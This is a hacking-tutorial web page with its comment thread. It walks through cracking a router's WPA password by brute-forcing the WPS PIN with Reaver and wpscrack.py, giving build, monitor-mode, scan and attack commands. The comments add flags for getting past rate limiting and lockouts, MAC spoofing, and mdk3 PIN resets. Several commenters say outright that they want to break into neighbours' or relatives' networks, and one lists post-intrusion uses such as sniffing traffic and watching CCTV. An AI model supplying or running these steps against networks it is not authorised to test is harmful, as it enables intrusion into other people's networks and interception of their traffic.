A flaw in WPS, or WiFi Protected Setup, known about for over a year by TNS, was finally exploited with proof of concept code. Both TNS, the discoverers of the exploit and Stefan at .braindump have created their respective "reaver" and "wpscrack" programs to exploit the WPS vulnerability. From this exploit, the WPA password can be recovered almost instantly in plain-text once the attack on the access point WPS is initiated, which normally takes 2-10 hours (depending on which program you use).
This exploit defeats WPS via an intelligent brute force attack to the static WPS PIN. By guessing the PIN, the router will actually throw back, whether or not the first four digits (of eight) are correct. Then, the final number is a checking number used to satisfy an algorithm. This can be exploited to brute force the WPS PIN, and allow recovery of the WPA password in an incredibly short amount of time, as opposed to the standard attack on WPA.
In this Null Byte, let's go over how to use both tools to crack WPS. As of yet, no router is safe from this attack, and yet none of the vendors have reacted and released firmware with mitigations in place. Even disabling WPS still allows this attack on most routers.
Requirements
- A computer (or virtual machine) running Kali Linux OS. If you're a beginner, you can start with our Kali Pi build based on the $35 Raspberry Pi. which we go over in detail here:
- A router at home with WPS
- A Wireless Network Adapter capable of monitor mode and packet injection. Confused? Check out our 2017 guide here, or you can get started with our most popular long range and short range adapters for beginners.
- The following programs installed (install by package name): aircrack-ng, python-pycryptopp, python-scapy, libpcap-dev
Tools
Crack WPS
Text in bold is a terminal command.
Follow the guide that corresponds to the tool that you chose to use below.
Reaver
- Unzip Reaver.
- unzip reaver-1.3.tar.gz
- Change to the Reaver directory.
- cd reaver-1.3
- Configure, compile and install the application.
- ./configure && make && sudo make install
- Scan for an access point to attack, and copy its MAC address for later (XX:XX:XX:XX:XX:XX).
- sudo iwlist scan wlan0
- Set your device into monitor mode.
- sudo airmon-ng start wlan0
- Run the tool against an access point.
- reaver -i mon0 -b <MA:CA:DD:RE:SS:XX> -vv
- Wait until it finishes.
This tool makes it too easy.
wpscrack.py
- Make the program an executable.
- chmod +x wpscrack.py
- Scan for an access point to attack, and copy its MAC address for later (XX:XX:XX:XX:XX:XX).
- sudo iwlist scan wlan0
- Get your MAC address, save it for later.
- ip link show wlan0 | awk '/ether/ {print $2}'
- Set your device into monitor mode.
- sudo airmon-ng start wlan0
- Attack your AP.
- wpscrack.py –iface mon0 –client <your MAC, because you're attacking yourself, right?> –bssid <AP MAC address> --ssid <name of your AP> -v
- Await victory.
Now, let's hope we see a lot of firmware update action going on in the near future, or else a lot of places are in a whole world of trouble.
Be a Part of Null Byte!
Just updated your iPhone? You'll find new emoji, enhanced security, podcast transcripts, Apple Cash virtual numbers, and other useful features. There are even new additions hidden within Safari. Find out what's new and changed on your iPhone with the iOS 17.4 update.
96 Comments
im a little confused, first line of code do you mean "reaper"? or "reaver"?
The software is actually Reaver, not Reaper.
Software lol reaver is only a script
There's a GUI app on sourceforge called WPSCrackGUI
Good stuff here
Wow.
please tell me any locked wifi passcode.
it doesn't find the reaper file
God has recreated humanity to perfection again as it was before Adam's disobedience...would you want to recreated today?
its simple as believing that Jesus died on that cross for you and confessing that from your heart!
Hi thanks fro this tutorial. However just download Backtrack 5 r3 that comes with REAVER and EasyCreds installed it'll save you a lot of time and nerves installing those programs! LOL
Have fun
i wann a hack a wifi password wpa plz plz help me i dont have net in my home :/ plz
Mehdi:
I will be running tutorials on cracking WPA and WPA2 using aircrack-ng next week .
OTW
sudo iwlist scan wlan0
iwlist: unkwown command 'wlan0' (check 'iwlist --help').
any help with this problem? thanks
it tells you to check iwlist help )))
you need to type
sudo iwlist wlan0 scanning
instead
I get:
"wlan0 Interface doesn't support scanning."
I suppose yourwifi interface do not support monitor mode..
It says that you interface wifi card not detected or has another name ..just type *ifconfig*and press enter and note the name of your wifi interfacr and the run the command replacing wlan0 with name of you wifi card.
Did you install reaver?
OTW
i did install reaver and all that has been asked to installed in the tutorials...thanks
OK. Are you in the right directory? Is your wireless interface named wlan0 (if could be wlan1). Check to see by typing iwconfig.
OTW
sorry OTW..what do you mean by the right directory? you mean i should be in the reaver directory before typing sudo iwlist scan wlan0 ? I don't get it..kindly explain well thanks
Mike:
It looks like the author of this article made a typo. Surprised no one caught it before now. The command should be;
sudo iwlist wlan0 scan
OTW
hahaha interesting :D are you not the author ? OccupyTW??? LOL :) anyway thanks a lot...imma try it now
anyway now is scanning fine after correcting that typo...but after i do the attack on my wifi...sudo reaver -i mon0 -b XX:XX:XX:FF:DD:DD -vv ..all i get is ..
waiting for beacon from XX:XX:XX:FF:DD
switching mon0 to channel 1
Associated with XX:XX:XX:FF:DD (ESSID: somename)
and thats it... only three lines and it stops there with the curser blinking..I am immaging that reaver is working trying to find me the password, but is kinda strange just sittting here watching the cursor blinking waiting for magic...tell me is normal...or did i do something wrong again?
Is it possible to fast crack if i already know the wps no?
And also is it possible to crack if wps is diseable ?
Yes, If you know the WPS pin then you can get results in seconds
reaver -i mon0 -b <targetmac> -vv --pin <wpspinhere>
ok so i got reaver working fine...after two days of waiting patiently..(aargghhh) ..now reaver gets locked up at 90.90%...repeating the same pin over and over again..through out the whole night...was thinking it was network signal problem..so i got the network signal to go up...and reaver was testing each pin at 5seconds/pin (not bad) but unfortunately it kept on repeating the same pin ...
been checking on other forums and it seems am not the only one having that problem...but nobody has suggested a solution...
master OTW...do you have a solution? anybody got a solution?
am using reaver on kali...someone was talking about the new version of reaver having a bug or something...help pls...
bro i too had the same problem it got stuck on 90.90%.....stuck on same pin like 99995867 i waited for 24hours this is what i get in the end .
so plz if you find the solution or what the problem might had been let me know
h
how can i download it !! i dowload the reaver zip file then when i extract it it show 2 files that non have an install prog. !! heeelp
Eng:
Are you using Windows or Linux?
OTW
my router has rate limiting (ap rate limiting wait 60sec)
is there a way to crack these kind of routers
and alo one of test run got stuck on 90.90% after checking all the pins(99995867) what do u think is the problem......
I'm running in to the same issue. I'm assuming that all new routers now have this protection feature. From what I'm seeing, we should still be able to gain access to the PIN but it is going to take a lot longer (considering we are having to wait a minute between each attempt basically).
As far as a work around, I'm racking my brain and can't really think of any for this type of attack. Perhaps someone with more experience could give us some insight.
I'll probably end up doing an "Evil Twin" attack. It's the only type I haven't attempted yet and seems very clever :)
hi,
I try with Reaver on BackTrack, after 24h and 33% accomplished , he tells : don't managed to identified with BSSID *****
I stop and rescan with wash -i mon0 but the BSSID in question don't appear in the list whereas with airodump-ng mon0 he appears.
(haven't try with iwlist wlan0 scan yet)
Any idea ?
thanks
is that possible without linux os?
No, you really need to use Linux. Get one of the hacking Linux distributions like BackTrack or Kali, among others.
OTW
I typed sudo airmon-ng start wlan0 but I got this sudo: airmon-ng: command not found
Any help with this?, thanks.
Daniel:
Welcome to Null Byte!
Are you using BackTrack? If not, do you have aircrack-ng?
OTW
i have pin code' mac' bssid' and SSID of a wifi please give me the easiest way to hack wifi am new user dont know how to hack using window8 any one plz
Atlas:
Welcome to Null Byte!
As for hacking wifi with Windows 8, you have a few options. Aircrack-ng has a Windows version, but I can't vouch for its effectiveness. Cain and Abel runs on Windows and is an excellent wifi cracking tool, but you need to buy a special wireless card that runs hundreds of dollars.
My recommendation is that you invest a bit of time and learn Linux. Most hacking tools are designed for Linux and most hackers use Linux for a number of very good reasons. I have 13 tutorials here on Null Byte on the basics of Linux for new hackers.
OTW
thank you for your reply m a simple user of internet dont know much about linux is that possible i use window 8 and linuxe on same pc?
here we dont have linux how can i download from where?
is it cost my pc data which i have now?
one another question when i have pincode ssid bssid and mac number
how long it will take hacking wifi?
okay i got every thing about linux all from unbuntu web site.
at least tell me now how long it will take when i know about a wifi ssid bssid mac and pincode number?
plz plz rply
Easiest way is download kali linux 32x from offensive security as an iso. Burn it and run it as a live boot disk. The default user is root and the password is toor. Onve its boots open terminal and type wifite. That will be a gui tool the rest is automatic. Both wps and wep can be hacked easily. However many new routers have recieved firmware upfates to block this method of attack so dont be expecting this to work. Finally if your wireless card does not support monitor mode then ur going to need to get a usb antenna may i suggest a signalking antenna . If you get it working then well done u have completed ur first task. If ur really good then use sdr to hack mobile phone calls. Both and more are very easy with kali linux. Most facebook viruses are made from the social engineering toolkit from kali. But reading is one thing. Actually doing it will land you in jail. Soo dont cry if you end up on the end of blacks willy. Happy hunting. :)
OK, I have a question and I am a newby in this, Do you need a dicctionary in this atack and does this work for wpa keys also?
No dictionary. This attack finds a 8 digit pin number that can be used to acquire a password. Because the the routers are dumb and give you check sums and stuff, the number of pins you need to check is reduced to a few thousand.
master otw:
how can i know that our victims router is using wps or not????
and reaver is a part of backtrack5 or we need to download reaver???
I know this was a long time ago, so not sure if you still need this info (or are even active), but there are at least 2 ways to do this that I know of.
It can be done in the terminal using a command like wash -i or something like that. Sorry I don't have the exact command for you, but honestly I'm tired and I can't remember. (Hopefully you can manage to google this yourself though)
The second and noob way (I may catch some flak by giving you this cheat but you seem like the kind of person that wants it the easy way, no offense), is to access the Fern wifi cracker in your Kali tools. When you scan for AP's it will show you whether they support WPS or not. I wouldn't count on this GUI as being 100% accurate though but it is a good place to start.
As far as using fern to crack the password, I think you would be much better off using aircrack or reaver in the terminal. Fern is just basically a GUI of aircrack in my opinion, but using it will rob you of the command line practice we all need.
Hope this helped (sorry if I sounded rude, wasn't my intent)
How can i hack someone wifi if i know there wps pin.Previously i hacked my borthers wifi and i also manged to gain access in the router and i noted the wps pin then for some reasons he changed password now i dont want to waste my 6 hours. can it be short if i know wps pin.
Please tell me whether this can be done in mac os (apple). If yes , how..?? (Same procedure or something else)
Yes
Same procedure + Live DVD or VM or Convert to Linux or Ask The owner for access.
Can I crack wpa without a router,just a laptop ?I have linux loaded on my windows laptop,just have to reboot and start in linux
yes, you just need Kali and Reaver. No router necessary
thanks for the quick info,got a couple more for you though,lol.Any links to a tut on how,everyone i seen tells you to must have a router of your own to start. I loaded linux on my system but it seems to hang when i reboot so I made it reboot form a usb drive,how do I get it off my system now? thanks
Eve:
The WPA2 hacking tutorials here at Null Byte don't require you use a router. Check this one out.
OTW
They may be referring to the fact you need a router on your network to try this. ;-p
thanks so I have to set up a VM to load Kali Linux on first ,right?Then run Cowpatty from there.
Yes. Or you can run it as a dual boot system.
guys got vm installed but had no option for a windows 7 64 bit so i went with the 32 bit option,is that ok? I downloaded Kali iso.
yes, but it will be slower.
so i got the Kali iso loaded on a usb stick,it says to reboot now and select the usb option to boot from when my laptop starts....problem,theres is no reboot from usb option in the start up screen on my laptop.All that is there is windows 7 and a previous attempt to load backtrack that I can't seem to remove,damian or something like that.Any ideas on what i can do?
Go into bios change boot order
sorry Iam new at this,how do I get there,also how do I get rid of the other option thats there now that never installed right? BTW I wrote the Kali iso to the usb with unetbootin so that should have made the usb bootable right?
Reboot PC hit either DEL or Enter depending on MB enter bios and find boot order.
Ok guys got the boot order changed to USB flash drive, rebooted several times with Kali ISO loads on stick through unetbootinbut still won't boot from USB drive. Did I miss something?
ok got it loaded on usb stick,it booted and started to install Kali linux but stops on "detecting network hardware" and goes no further.ant ideas please? I have no hardware,just a laptop trying to hack next doors wireless.
Beleive me it is not, only, awlays between 2-10 hours
I know what i'm talking about lol
I've spent a 32 hours waiting and "Passphrase not in dictionnary"
Because most pass phrases now days are 14-26 chars, long all random alpha-numeric. You may get lucky with a word list.. Avg crack time on non GPU cluster about 195 years./ I hash at 105k and makes no difference.
195 years too much for me, i finally get it by the other way SE
hello . I have a Problem with reaver .and this is my problem...
can any 1 help my plz ...
add -d 0 -l 420 to reaver argument. Spoof the MAC of mon0 as well. Pretty sure you are dealing with new firmware on the AP.
So chances are slim to none for successful pin harvest.
But you can blast it with mdk3. It may reset the pin if it doesn't DoS freeze the AP and req admin reboot. However in my experience mdk3 pin reset only works against TKIP AP's.
Side note:
This is a TP-Link AP yes?
reaver 1.5? really? Like to look at the code.
Just a personal experience that might be interesting to share, though I don't know if someone has already said this: according to Reaver version 1.4, the arguments --dh-small and -d 0 almost half the time spent. Theorically (correct me if I'm wrong) there are 40.320 combinations. My results are 2 seconds/pin, almost 1800 pins per hour (fails exluded).
So with my test AP it would take 22,4 hours to complete the process, let's assume we have it at half, a pretty good result I'd say. But I heard of better performances, is it possible to speed the process up even more?
EDIT: see Cyber's reply, this is totally wrong.
Greetings, CIUFFY.
An 8 digit pin using 0-9 = 10 to the 8th possible combinations (100,000,000).
However since the 8th digit isn't part of the pin it is just a check sum of the other 7, total = 10 to the 7th (10,000,000).
However WPS presents the pin in two halves for verification. So if one half of 4 digits are correct it will just work on the other half of 4.
Don't forget the second half has one space for a check sum, so really it's just 3 digits in the second half.
The correct total for WPS (10 to the 4th + 10 to the 3rd = 11,000). So the first half has 10,000 possible combinations and the second half has just 1,000.
Short keys (--dh-small,-S) will speed it up. My lab gives me 22-90 secs a pin on updated firmware routers. 2-3 seconds on old firmware.
Also things to note is that even tho the router says locked or no WPS hit it anyway(-L) to vet that because my recent tests show they are unlocked yet flagging locked.
What I used last..
"reaver -i monx -a -S -N -E -b xx:xx:xx:xx:xx:xx -vv -d 3 # -r 2:199 # if you are getting locked out too much add that it may help"
-a Auto select some advanced features.
-S Use small diffleman attacks (reduces strain on the router & increases speed).
-N No nacks, just speeds things up a bit.
-E Terminates each pin attempt with an EAPOL fail so it may trick the router into thinking the pin failed and may let you try more before it locks.
-d The default delay period between pin attempts is 1 second.
-r Recurring delay. Sleep for y number of seconds every x pin attempts.
Thankyou for clarifications, I really messed up with calculations there, I didn't thought about the other possible digits (0-9), whoops. Also, I didn't know the two halves of verification, so really thank you for clarification.
So, it means that the amount of combinations is actually 4 times lower than I calculated? Which brings to amazing perfomance (according to my very outdated router).
Thank you again!
No worries, Yeap you are running at speeds that I wish still was the norm. Most new routers do not play nice with reaver anymore.
i have a question, in reaver when it tries the wps pins, i have an app that it can get me the router's pin without connecting to it, is there a way to enter that pin with reaver? or is there a difference between the pin i get and the pin that reaver tries?
thank you :)
having problem with reaver
reaver -i mon0 -b EC:22:80:*:*:* -a -S -c 10 -vv
Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
! WARNING: Receive timeout occurred
! WARNING: Receive timeout occurred
! WARNING: Receive timeout occurred
! WARNING: Receive timeout occurred
can any one help!!
I encounter reaver keep trying pin 12345670 over and over again for more than 2 days. using Alfa AWUS036H USB wireless adapter.
pls. help.
I observed 3 notable fail transaction.....
! WPS transaction failed (code: 0x02), re-trying last pin
! WPS transaction failed (code: 0x03), re-trying last pin
! WPS transaction failed (code: 0x04), re-trying last pin
steps that i had used
airmon-ng
airmon-ng start wlan0
wash -i mon0
reaver -i mon0 -b 34:08:04:6F:0F:B0 -vv
Happy New Year to all Null Byte ......appreciate some help on the hacking issue I am facing.
Sorry if nobody answered, maybe someone thought you might have found the way out yourself.
As far as I can tell, this is a signal strength, and this is the most common reason on google for error 0x02 (and 0x03 also, strange that it is returning different errors, that however are usually connected to the same issue).
Are you sure the AP is vulnerable? Try the command suggested by CyberHitchHiker above.
I was told that DLink DIR 615 has new firmware 7.17 that blocks hacking.....is it true?
Hi, If it will work with WPA II WPS 1.0 or WPA WPS 1.0 ? My own TP-LINK auto lock the WPS when I try use reaver 1.4 attack WPS :(
Yes it will and if you can connect to the TP-Link you can run exploits against it cause TP-Link has issues.
WPS PIN: '44554484'
WPA PSK: 'd8294ce269dac37d7b45bbc640b2e11238f9cd194d3c591381c9c028e4dd321b'
Do you know why reaver is giving this hash WPA PSK key? Thank You.
It may be a stupid Question. But what do i have to do to connect to a network when i have the WPS pin? How can i actually connect using the WPS pin? Thanks!
I think you got the answer before because it's been a long time ,but if you not then in this year 2020 you can use jumpstart software or any other software for connecting to that network ,then you will get the actual password
Hi all, when i try to crack the wps i'm stuck at this:
root@Kali:~# reaver -i wlan1mon -b (Address)
Reaver v1.5.2 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
mod by t6x <t6x@hotmail.com> & DataHead & Soxrok2212
And it don't move for hours :(
Throw a -vv at the end and see why not?
I'll guess it's channel hopping and failing to associate.
i had to kill a process, one from the list that terminal give you when you put the interface in monitor mode
Hey all, i'm a new here ,i have a proplem when i install kail lunx such as basic system on my computer its not work i start my computer and tell me boot not install put disk and press any bitton
Thx for read
Pls , help me if u can
OK so I just went into Google did a basic search for how to hack into a locked wifi connection and this site came up first. So I've been reading this forum. My one question is I have a basic smarty phone. It's powered by Android the name of MH phone is Alcatel one touch. When I go into my wifi settings I can see about 7 available networks but they are all locked. How do I figure out their password. I do not have a computer or router of my own. Please someone give me simple Direction'thanks
There are numerous articles here on Null Byte on breaking wifi passwords. I have an entire series on cracking wifi here.
I NEED WPS PIN
hi there peeps!
I remember when REAVER, Bully and Pixie Dust came (approx 2,5 years ago it was implemented in Kali Linux's "wifite" but their attacks are so old that manufacturers have patched most of it with the annoying WPS lockout by now im afraid :)
People also do upgrade their equipment both with firmware and physically.. BUT if you think about it.. there is possible to spoof... GO figure it out, Kali tools are getting too outdated by now and "derv82" the author of wifite has not been active in the community for some time and let Wifite2 unfinished allready couple years ago.
Implementing mac spoofing with macchanger would actually work on most manufacturers, because the accesspoints dont/cant close out eventually their real clients in a total lockdown anyway :) with that said, you/someone must add a macchanger routine to Wifite by yourself :)
Best regards, kimocoder
Kali & NetHunter Developer & Sony Mobile & Playstation Developer
I'm really dumb when it comes to technology, so bear with me here. I'm just curious..what is the point in hacking someone's wifi? is it just to be abl2 use their wifi 4 free or is there more 2 it than that? if so what all can u do when u hack someones wifi? I realize this is a really old post btw but just accidentally came across it
It would all depend on your end game. If you needed free Wifi it would serve that purpose just fine. If you needed to create a MITM attack, scan for compromised routers, grab data off media servers, sniff traffic, watch CCTV, harvest information, hide yourself or prank someone it could all be possible.
This router attack rarely works anymore. Despite what the article says, most manufacturers have patched this vulnerability.
These days encryption keys are getting longer and harder to crack. A brute force attack would take an incredibly long time to succeed. Your attacking machine would probably be obsolete by then.
What does one gain from this quite labor intensive process? Free stolen wifi? Even in my little town free, open wifi is available throughout most of the area.
Hmm, outdated articles, which are often incorrect coupled with an abundance of ads which I never see (hint, ad away works fantastic)
This would appear to be another affiliate site. No harm in that. I've been an affiliate for several companies.
Share Your Thoughts